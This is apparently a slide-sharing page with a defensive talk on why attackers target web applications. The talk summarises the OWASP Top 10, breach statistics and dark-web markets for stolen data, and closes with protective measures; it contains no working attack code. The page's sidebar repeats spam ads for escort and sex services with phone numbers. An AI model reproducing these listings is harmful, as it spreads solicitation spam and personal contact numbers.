TECHNIQUES FOR ATTACKING WEB APPLICATION SECURITYTECHNIQUES FOR ATTACKING WEB APPLICATION SECURITY
TECHNIQUES FOR ATTACKING WEB APPLICATION SECURITY
 

Recently uploaded

(8264348440) 🔝 Call Girls In Green Park 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Green Park 🔝 Delhi NCR(8264348440) 🔝 Call Girls In Green Park 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Green Park 🔝 Delhi NCRsoniya singh
 
Call Girls in Tilak Nagar (DELHI-) 8377877756 Call Girls Service
Call Girls in Tilak Nagar (DELHI-) 8377877756 Call Girls ServiceCall Girls in Tilak Nagar (DELHI-) 8377877756 Call Girls Service
Call Girls in Tilak Nagar (DELHI-) 8377877756 Call Girls Servicedollysharma2066
 
Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...Authentic No 1 Amil Baba In Pakistan
 
Call Girls At-( Nearby )-Bhikaji Cama Place, Delhi | ⑧③77⓿⑧76⓿7
Call Girls At-( Nearby )-Bhikaji Cama Place, Delhi | ⑧③77⓿⑧76⓿7Call Girls At-( Nearby )-Bhikaji Cama Place, Delhi | ⑧③77⓿⑧76⓿7
Call Girls At-( Nearby )-Bhikaji Cama Place, Delhi | ⑧③77⓿⑧76⓿7dollysharma2066
 
Guwahati Call Girls 7001305949 WhatsApp Number 24x7 Best Services
Guwahati Call Girls 7001305949 WhatsApp Number 24x7 Best ServicesGuwahati Call Girls 7001305949 WhatsApp Number 24x7 Best Services
Guwahati Call Girls 7001305949 WhatsApp Number 24x7 Best Servicesnajka9823
 
Delhi Munirka 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex call girl
Delhi Munirka 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex call girlDelhi Munirka 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex call girl
Delhi Munirka 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex call girlsoniya singh
 
Product Catalog Bandung Home Decor Design Furniture
Product Catalog Bandung Home Decor Design FurnitureProduct Catalog Bandung Home Decor Design Furniture
Product Catalog Bandung Home Decor Design Furniturem3resolve
 
Report about the AHIABGA-UnityNet UNDRIPDay / Earth-Day 2024 Gathering in Mar...
Report about the AHIABGA-UnityNet UNDRIPDay / Earth-Day 2024 Gathering in Mar...Report about the AHIABGA-UnityNet UNDRIPDay / Earth-Day 2024 Gathering in Mar...
Report about the AHIABGA-UnityNet UNDRIPDay / Earth-Day 2024 Gathering in Mar...LHelferty
 
Viet Nam Inclusive Business Accreditation System
Viet Nam Inclusive Business Accreditation SystemViet Nam Inclusive Business Accreditation System
Viet Nam Inclusive Business Accreditation SystemTri Dung, Tran
 
(8264348440) 🔝 Call Girls In Sriniwaspuri 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Sriniwaspuri 🔝 Delhi NCR(8264348440) 🔝 Call Girls In Sriniwaspuri 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Sriniwaspuri 🔝 Delhi NCRsoniya singh
 
Model Call Girl in Bawana Delhi reach out to us at 🔝8264348440🔝
Model Call Girl in Bawana Delhi reach out to us at 🔝8264348440🔝Model Call Girl in Bawana Delhi reach out to us at 🔝8264348440🔝
Model Call Girl in Bawana Delhi reach out to us at 🔝8264348440🔝soniya singh
 
About Entrepreneur ELON MUSK .pptx...
About Entrepreneur ELON MUSK .pptx...About Entrepreneur ELON MUSK .pptx...
About Entrepreneur ELON MUSK .pptx...lahiruherath654
 
(8264348440) 🔝 Call Girls In Safdarjung Enclave 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Safdarjung Enclave 🔝 Delhi NCR(8264348440) 🔝 Call Girls In Safdarjung Enclave 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Safdarjung Enclave 🔝 Delhi NCRsoniya singh
 
TDC Health Limited Nigeria Business Plan Opportunity Presentation 2024
TDC Health Limited Nigeria Business Plan Opportunity Presentation 2024TDC Health Limited Nigeria Business Plan Opportunity Presentation 2024
TDC Health Limited Nigeria Business Plan Opportunity Presentation 2024Fikrie Omar
 
Gurgaon Rajiv Chowk 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex ...
Gurgaon Rajiv Chowk 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex ...Gurgaon Rajiv Chowk 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex ...
Gurgaon Rajiv Chowk 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex ...soniya singh
 

Recently uploaded (20)

(8264348440) 🔝 Call Girls In Green Park 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Green Park 🔝 Delhi NCR(8264348440) 🔝 Call Girls In Green Park 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Green Park 🔝 Delhi NCR
 
Call Girls in Tilak Nagar (DELHI-) 8377877756 Call Girls Service
Call Girls in Tilak Nagar (DELHI-) 8377877756 Call Girls ServiceCall Girls in Tilak Nagar (DELHI-) 8377877756 Call Girls Service
Call Girls in Tilak Nagar (DELHI-) 8377877756 Call Girls Service
 
Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
 
Hot Sexy call girls in Rajouri Garden🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rajouri Garden🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Rajouri Garden🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rajouri Garden🔝 9953056974 🔝 Delhi escort Service
 
Call Girls At-( Nearby )-Bhikaji Cama Place, Delhi | ⑧③77⓿⑧76⓿7
Call Girls At-( Nearby )-Bhikaji Cama Place, Delhi | ⑧③77⓿⑧76⓿7Call Girls At-( Nearby )-Bhikaji Cama Place, Delhi | ⑧③77⓿⑧76⓿7
Call Girls At-( Nearby )-Bhikaji Cama Place, Delhi | ⑧③77⓿⑧76⓿7
 
Guwahati Call Girls 7001305949 WhatsApp Number 24x7 Best Services
Guwahati Call Girls 7001305949 WhatsApp Number 24x7 Best ServicesGuwahati Call Girls 7001305949 WhatsApp Number 24x7 Best Services
Guwahati Call Girls 7001305949 WhatsApp Number 24x7 Best Services
 
Delhi Munirka 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex call girl
Delhi Munirka 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex call girlDelhi Munirka 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex call girl
Delhi Munirka 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex call girl
 
Product Catalog Bandung Home Decor Design Furniture
Product Catalog Bandung Home Decor Design FurnitureProduct Catalog Bandung Home Decor Design Furniture
Product Catalog Bandung Home Decor Design Furniture
 
Report about the AHIABGA-UnityNet UNDRIPDay / Earth-Day 2024 Gathering in Mar...
Report about the AHIABGA-UnityNet UNDRIPDay / Earth-Day 2024 Gathering in Mar...Report about the AHIABGA-UnityNet UNDRIPDay / Earth-Day 2024 Gathering in Mar...
Report about the AHIABGA-UnityNet UNDRIPDay / Earth-Day 2024 Gathering in Mar...
 
Cheap Rate ➥8448380779 ▻Call Girls In Sector 56 Gurgaon
Cheap Rate ➥8448380779 ▻Call Girls In Sector 56 GurgaonCheap Rate ➥8448380779 ▻Call Girls In Sector 56 Gurgaon
Cheap Rate ➥8448380779 ▻Call Girls In Sector 56 Gurgaon
 
Viet Nam Inclusive Business Accreditation System
Viet Nam Inclusive Business Accreditation SystemViet Nam Inclusive Business Accreditation System
Viet Nam Inclusive Business Accreditation System
 
(8264348440) 🔝 Call Girls In Sriniwaspuri 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Sriniwaspuri 🔝 Delhi NCR(8264348440) 🔝 Call Girls In Sriniwaspuri 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Sriniwaspuri 🔝 Delhi NCR
 
Pakistani Jumeirah Call Girls # +971559085003 # Pakistani Call Girls In Jumei...
Pakistani Jumeirah Call Girls # +971559085003 # Pakistani Call Girls In Jumei...Pakistani Jumeirah Call Girls # +971559085003 # Pakistani Call Girls In Jumei...
Pakistani Jumeirah Call Girls # +971559085003 # Pakistani Call Girls In Jumei...
 
Model Call Girl in Bawana Delhi reach out to us at 🔝8264348440🔝
Model Call Girl in Bawana Delhi reach out to us at 🔝8264348440🔝Model Call Girl in Bawana Delhi reach out to us at 🔝8264348440🔝
Model Call Girl in Bawana Delhi reach out to us at 🔝8264348440🔝
 
About Entrepreneur ELON MUSK .pptx...
About Entrepreneur ELON MUSK .pptx...About Entrepreneur ELON MUSK .pptx...
About Entrepreneur ELON MUSK .pptx...
 
(8264348440) 🔝 Call Girls In Safdarjung Enclave 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Safdarjung Enclave 🔝 Delhi NCR(8264348440) 🔝 Call Girls In Safdarjung Enclave 🔝 Delhi NCR
(8264348440) 🔝 Call Girls In Safdarjung Enclave 🔝 Delhi NCR
 
Why Powderless DTF Printer is T-shirt Printing Game Changer.pptx
Why Powderless DTF Printer is T-shirt Printing Game Changer.pptxWhy Powderless DTF Printer is T-shirt Printing Game Changer.pptx
Why Powderless DTF Printer is T-shirt Printing Game Changer.pptx
 
TDC Health Limited Nigeria Business Plan Opportunity Presentation 2024
TDC Health Limited Nigeria Business Plan Opportunity Presentation 2024TDC Health Limited Nigeria Business Plan Opportunity Presentation 2024
TDC Health Limited Nigeria Business Plan Opportunity Presentation 2024
 
Gurgaon Rajiv Chowk 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex ...
Gurgaon Rajiv Chowk 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex ...Gurgaon Rajiv Chowk 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex ...
Gurgaon Rajiv Chowk 🔝 Call Girls Service 🔝 ( 8264348440 ) unlimited hard sex ...
 
young call girls in kailash Nagar, 🔝 9953056974 🔝 escort Service
young call girls in kailash Nagar, 🔝 9953056974 🔝 escort Serviceyoung call girls in kailash Nagar, 🔝 9953056974 🔝 escort Service
young call girls in kailash Nagar, 🔝 9953056974 🔝 escort Service
 

What Makes Web Applications Desirable For Hackers

  • 1. 1 WHAT MAKES WEB APPLICATIONS DESIRABLE FOR HACKERS How To Protect Yours CTO / Co-Founder at Venkon JAIME MANTEIGA
  • 2. 2 Agenda 01 02 03 To protect your applications, it is essential to know "how" web application hacking techniques work. What Techniques Do Attackers Use? Data is the new "gold" and hackers know that — a glance into dark web markets. What’s The Value Of Stolen Data? — How They Make Money Before asking the “how” it’s important to know the “why”. What Motivates Unethical Hackers? 04Understanding and thinking like an attacker will give us a new perspective on how to improve our web security posture. How Can We Protect Ourselves? 05Sources and citations. References 06Share your thoughts, fears, and doubts. Questions?
  • 3. 3 Introduction What Makes Web Applications Desirable For Hackers — How To Protect Yours Jaime Manteiga is a dynamic Information Security Professional and Researcher who assists organizations across the world by improving their information security posture and cybersecurity challenges. Additionally, Jaime Manteiga as an Information Security Researcher holds public recognition from organizations such as Tesla, Shopify, United Airlines and Spotify for helping them to identify and mitigate information security flaws. Bio @JaimeManteiga Active Social Media Networks: Get in touch CTO / Co-Founder at Venkon JAIME MANTEIGA @JaimeManteiga https://www.linkedin.com/in/jaimemanteiga/ https://medium.com/@jaime.manteiga jaime.manteiga@Venkon.us
  • 4. 4 There are hundreds of methods hackers can use to take advantage of the security vulnerabilities in your applications, but there are just a few reasons to do it. These are the top motives in descending order: Motivation IDEOLOGY FUN ESPIONAGE FINANCIAL GAIN What Motivates Unethical Hackers? Before asking the “how” it’s important to know the “why” * Sources of the stats will be exhibited at the references slide
  • 5. 5 What Motivates Unethical Hackers? Cybersecurity Breaches, Costs and Facts * Sources of the stats will be exhibited at the references slide 2016 2017 2018 Marriott Hacking Exposes Data of Up to 500 Million Guests. Including names, addresses, dates of birth, passport numbers, email addresses and phone numbers Marriott Hotels In 2016, 3 billion Yahoo accounts were hacked in one of the biggest breaches of all time. Yahoo Uber reported that hackers stole the information of over 57 million riders and drivers. Uber The average cost of a cybersecurity attack on a company is $2.4 million. Under Armour reported that its “My Fitness Pal” was hacked, affecting 150 million users. Under Armour 147.9 million consumers were affected by the Equifax Breach. Equifax  In 2017, cyber crime costs accelerated with organizations spending nearly 23 percent more than 2016 — on average about $11.7 million  The most expensive component of a cyber attack is information loss, which represents 43 percent of costs  The average cost per lost or stolen records per individual is $141 — but that cost varies per country. Breaches are most expensive in the United States ($225) and Canada ($190)  In companies with over 50k compromised records, the average cost of a data breach is $6.3 million  Damage related to cybercrime is projected to hit $6 trillion annually by 2021
  • 6. 6 What Motivates Unethical Hackers? Marriott Hotels Security Breach Nov. 30, 2018 Marriott Breach Exposes Data of Up to 500 Million Guests. The hotel chain said that personal details including names, addresses, dates of birth, passport numbers, email addresses and phone numbers for hundreds of millions of guests may have been compromised. In the United States, the New York Attorney General's office said it had opened an investigation into the data breach. Marriott's (MAR) stock is plunging on the news, falling more than 6% in trading. The combined company has 6,700 properties in more than 129 countries. The next figure illustrates how the stock value was sinking after the incident. Overview
  • 7. 7 Hacking web applications is nothing new, but the methods used by attackers are constantly changing. There are several factors to determine which techniques an attacker can attempt to use in order to compromise your application — such as, programming language, web server version, server operative system, database type, etc. Hence, there is no -one answer- to determine which method they will use to compromise your application. The following illustration represents the paths that attackers can use to discover weaknesses; sometimes it takes multiples paths to compromise an application, depending on its complexity. What Techniques Do Attackers Use?
  • 8. 8What Techniques Do Attackers Use? OWASP TOP 10 Explained A1 - Injection A2 - Broken Authentication A3 - Sensitive Data A4 - XMLExternal Entities (XXE) A5 - Broken AccessControl A6 - Security Misconf guration A7 - Cross-SiteScripting (XSS) A8 - Insecure Deserialization A9 - Using Componentswith Known Vulnerabilities A10 - Insuf cient Logging &Monitoring We summarized a list of the most critical web application security risks following OWASP Top 10 (Open Web Application Security Project). This list focuses on identifying the most serious web application security risks for a broad array of organizations and industries.
  • 9. 9 A2 A1 A3 A4 INJECTION Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. What Techniques Do Attackers Use? OWASP TOP 10 Explained Part 1 A5 Mixer BROKEN AUTHENTICATION Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently. . SENSITIVE DATA EXPOSURE Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. XML EXTERNAL ENTITIES (XXE) Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks. BROKEN ACCESS CONTROL Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.
  • 10. 10 A7 A6 A8 A9 SECURITY MISCONFIGURATION Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. What Techniques Do Attackers Use? OWASP TOP 10 Explained Part 2 A10 Mixer CROSS-SITE SCRIPTING (XSS) XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. INSECURE DESERIALIZATION Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks. USING COMPONENTS WITH KNOWN VULNERABILITIES Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. INSUFFICIENT LOGGING & MONITORING Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data.
  • 11. 11 We already know that the principal motivation for hackers is the financial gain — to know more in detail how much money they make, and how they sell the stolen data, we have to examine their communication channels. There are several ways for hackers to communicate, sell and exchange, but the most used is the "TOR Network," also known as "dark web or deep web." Simply put, TOR is an uncensored internet network principally used by cybercriminals. What’s The Value Of Stolen Data How They Make Money
  • 12. 12 Dark Web Forums are one of the places where cybercriminals trade their goods. They use underground forums as a safe interface to advertise their products and services. It is extremely challenging to get access to most of these forums since they require extensive vetting and trust from other cybercriminals. For this presentation, we took a “safe dive” into the dark web with the purpose of examining cybercriminals trading methods: What’s The Value Of Stolen Data How They Make Money Taking a Dive Into The “Deep Web” Figure 1 – Most of the forums were either taken down or seized by international organizations such as FBI, Interpol, Europol, and the DEA. It is pleasing to find that international government collaboration is in place to protect us from cybercriminals.
  • 13. 13 What’s The Value Of Stolen Data How They Make Money Taking a Dive Into The “Deep Web” Figure 2 – As previously mentioned, it is tough to get access to these forums. The figure above lists the rules to access the "unrestricted areas" of this forum.
  • 14. 14 What’s The Value Of Stolen Data How They Make Money Taking a Dive Into The “Deep Web” Figure 3 – We found another forum that used to have “free registration” — now you are required to be invited by a current member and pay a membership fee.
  • 15. 15 What’s The Value Of Stolen Data How They Make Money Taking a Dive Into The “Deep Web” Figure 4 – After an intensive research period, we were able to get access into one of the least used marketplace forums for cybercriminals. In this figure, we can appreciate a few things: 1. The principal payment method used by cybercriminals is the cryptocurrency Bitcoin. 2. Stolen data is somewhat cheaper than expected: ~ $10 USD dollars for millions of stolen Dropbox records. 3. Cybercriminal Marketplaces are mostly organized. This database appears to be from the security breach reported by Dropbox in 2016 — back then cybercriminals were selling this information for around $1500 USD.
  • 16. 16 What’s The Value Of Stolen Data How They Make Money Taking a Dive Into The “Deep Web” After our investigation in the deep web, we concluded that cybercriminals find very valuable and profitable our web applications. Below is a list of the most offered services by cybercriminals: This method provides direct access to your application which allows them to resell it. Web Shells They modify the integrity of the code to distribute malware to the users using an Exploit Kit. Distributed Malware For applications handling payments, a code captures the entered credit card data and then stores it in some local file for the hackers to access. Credit Card Scraping Installing a JS code in your application will allow the cybercriminals to start mining cryptocurrencies for them. Crypto mining They sell traffic redirection of your applications to other cybercriminals. Redirecting Traffic They download a copy of the database to categorize and sell the information afterward. Database CYBERCRIMINALS MARKETPLACE FOR WEB APPLICATIONS
  • 17. 17 Unethical hackers are restlessly trying to compromise web applications, and if we don't want to become one of their victims posted on the dark web, we must ensure that our systems are appropriately secured. There is more profitability in our web applications than we expected, even if no valuable data is present. Cybercriminals will use compromised web apps for a variety of things — needless to say, all actions of cybercriminals regarding our apps will affect us significantly. How can we protect ourselves? Sadly, there is no "one-answer," it depends on several factors that apply to specific requirements of your application and organization. The good news is, as we previously mentioned OWASP (Open Web Application Security Project) has an updated guideline created by industry experts and leading organizations to ensure your application is properly secured. Below are some recommended steps for improvements: How Can We Protect Ourselves? Recommendations For Improvements OWASP have countless guidelines and best practices documentation to improve your applications overall security posture. OWASP This is the best foundation when testing for security issues. Ensure that your tests follow this methodology. OWASP TOP 10 Formalize a process to perform regular automated and manual security scans. Security Scanning Reduce security issues and raise the overall security level for every stage of your application development. Formalize a Software Development Lifecycle (SDLC) WAF applies deep packet inspection (DPI) techniques to scan every HTTP request and response to identify and block any malicious content. Implement a Web Application Firewall Perform regular web application security assessment using an independent contractor. This provides a degree of autonomy to test controls that you could be missing and an external view of potential security risks. Independent Security Assessment
  • 18. 18 Below are the sources and citations used in this presentation: References 2018 Official Data Breach Investigations Report from Verizon: https://enterprise.verizon.com/resources/reports/dbir/ 2016 Uber Data Breach: https://www.uber.com/newsroom/2016-data-incident/ 2017 Equifax Data Breach: https://www.equifaxsecurity2017.com/2018/03/01/equifax-releases-updated-information-2017-cybersecurity-incident/ 2018 Under Armour Data Breach: http://investor.underarmour.com/releasedetail.cfm?ReleaseID=1062368 Average cost of a data breach (Accenture) https://www.accenture.com/us-en/event-cybertech-europe-2017?src=SOMS#block-insights-and-innovation 2016 Yahoo Data Breach: https://www.oath.com/press/yahoo-provides-notice-to-additional-users-affected-by-previously/ 2018 Marriot Hotels Data Breach: http://news.marriott.com/2018/11/marriott-announces-starwood-guest-reservation-database-security-incident/ OWASP TOP 10 - 2017: https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
  • 19. 19 THANKS FOR WATCHING Questions, Thoughts, Fears or Doubts? @JaimeManteiga @JaimeManteiga https://www.linkedin.com/in/jaimemanteiga/ https://medium.com/@jaime.manteiga jaime.manteiga@Venkon.us